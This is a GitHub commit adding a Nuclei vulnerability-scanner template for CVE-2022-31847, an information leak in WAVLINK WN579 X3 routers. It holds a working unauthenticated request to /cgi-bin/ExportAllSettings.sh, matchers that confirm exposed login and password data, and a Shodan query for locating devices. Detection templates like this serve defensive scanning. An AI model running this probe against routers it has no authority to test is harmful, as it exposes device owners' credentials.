Create CVE-2022-31847.yaml

patch-1
Arafat Ansari 2022-08-15 01:48:03 +05:30 committed by GitHub
parent 689a07d542
commit 7eb08d8df2
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 35 additions and 0 deletions

View File

@ -0,0 +1,35 @@
id: CVE-2022-31847
info:
name: WAVLINK WN579 X3 M79X3.V5030.180719 - Information Disclosure
author: arafatansari
severity: high
description: |
A vulnerability in /cgi-bin/ExportAllSettings.sh of WAVLINK WN579 X3 M79X3.V5030.180719 allows attackers to obtain sensitive router information via a crafted POST request.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31847
- https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN579%20X3__Sensitive%20information%20leakage.md
metadata:
shodan-query: http.html:"Wavlink"
verified: "true"
tags: cve,2022,info,login,credentials
requests:
- raw:
- |
GET /cgi-bin/ExportAllSettings.sh HTTP/1.1
Host: {{Hostname}}
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'Login'
- 'Password'
- 'AuthMode'